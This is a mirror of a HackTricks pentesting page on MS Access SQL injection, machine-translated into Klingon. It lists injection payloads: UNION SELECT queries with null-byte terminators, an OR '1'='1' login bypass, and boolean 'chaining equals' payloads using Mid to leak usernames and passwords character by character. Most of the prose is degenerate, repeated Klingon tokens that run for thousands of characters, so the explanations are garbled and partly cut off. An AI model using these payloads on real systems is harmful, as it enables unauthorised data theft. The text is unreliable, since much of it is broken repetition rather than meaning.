Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 06:30:37 +00:00

Translator workflow b442ae90c4 Translated to Klingon

2024-02-10 17:52:19 +00:00

37 KiB

Raw Blame History

MS Access SQL Injection

htARTE (HackTricks AWS Red Team Expert) ! tlhIngan Hol

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Online Playground

https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format&ss=-1

DB Limitations

String Concatenation

String concatenation is possible with & (%26) and + (%2b) characters.

1' UNION SELECT 'web' %2b 'app' FROM table%00
1' UNION SELECT 'web' %26 'app' FROM table%00

Comments

MS access vItlhutlh. 'ach, 'oH vItlhutlh 'e' vItlhutlhbe'chugh, 'ach 'oH vItlhutlhbe'chugh 'e' vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlhbe'chugh vItlhutlh

1' union select 1,2 from table%00

If this is not working you could always fix the syntax of the query:

SELECT * FROM Users WHERE username = 'admin' AND password = 'password' OR '1'='1';

**ghItlhvam, vaj vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh 'e' vItlhutlh 'ej vItlhutlh '

1' UNION SELECT 1,2 FROM table WHERE ''='

Stacked Queries

Qa'Hom.

LIMIT

LIMIT ghItlh jatlh. Qatlh SELECT pagh N table rows ghItlh 'ej TOP operator jatlh. TOP integer argument ghItlh rows jatlh.

1' UNION SELECT TOP 3 attr FROM table%00

Qap yI'el LAST vaj rows from the end ghItlh.

UNION Queries/Sub queries

SQLi DaH jImej subqueries or extra queries a FROM is indicated ghItlh.
So, UNION SELECT or UNION ALL SELECT or a SELECT between parenthesis condition jatlh FROM with a valid table name chu'.
valid table name jatlh bej ghItlh.

-1' UNION SELECT username,password from users%00

Chaining equals + Substring

{% hint style="warning" %} Qa'vIn weird syntax MS Access allows '1'=2='3'='asd'=false. QaStaHvIS SQL injection WHERE clause vItlhutlh. {% endhint %}

MS Access database vItlhutlh SQLi 'ej (vaj) column name username vItlhutlh, 'ej 'oH exfiltrate field. boolean injection Mid function vItlhutlh substrings vItlhutlh content exfiltrate potentially web app responses vItlhutlh chaining equals technique vItlhutlh check.

'=(Mid(username,1,3)='adm')='

qaStaHvIS table ghItlh column 'ej dump SuvwI' Mid, LAST, TOP ghaH vaj leak info boolean SQLi vIleghlaH:

SELECT TOP 1 Mid(column, 1, 1) FROM table WHERE column > 'a' UNION ALL SELECT TOP 1 Mid(column, 2, 1) FROM table WHERE column > 'a' UNION ALL SELECT TOP 1 Mid(column, 3, 1) FROM table WHERE column > 'a' ... ORDER BY column

This query will extract the first character of the specified column, then the second character, and so on, until all the characters are leaked. The TOP 1 clause is used to ensure that only one character is returned at a time. The Mid function is used to extract a specific substring from the column value. The WHERE clause with the condition column > 'a' is used to ensure that only characters with a greater ASCII value than 'a' are selected, thus avoiding any potential errors. The UNION ALL operator is used to combine the results of multiple queries into a single result set. The ORDER BY clause is used to order the results by the column being extracted.

'=(Mid((select last(useranme) from (select top 1 username from usernames)),1,3)='Alf')='

Feel free to check this in the online playground.

Brute-forcing Tables names

Using the chaining equals technique you can also bruteforce table names with something like:

qo' vItlhutlh

chaining equals technique vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' 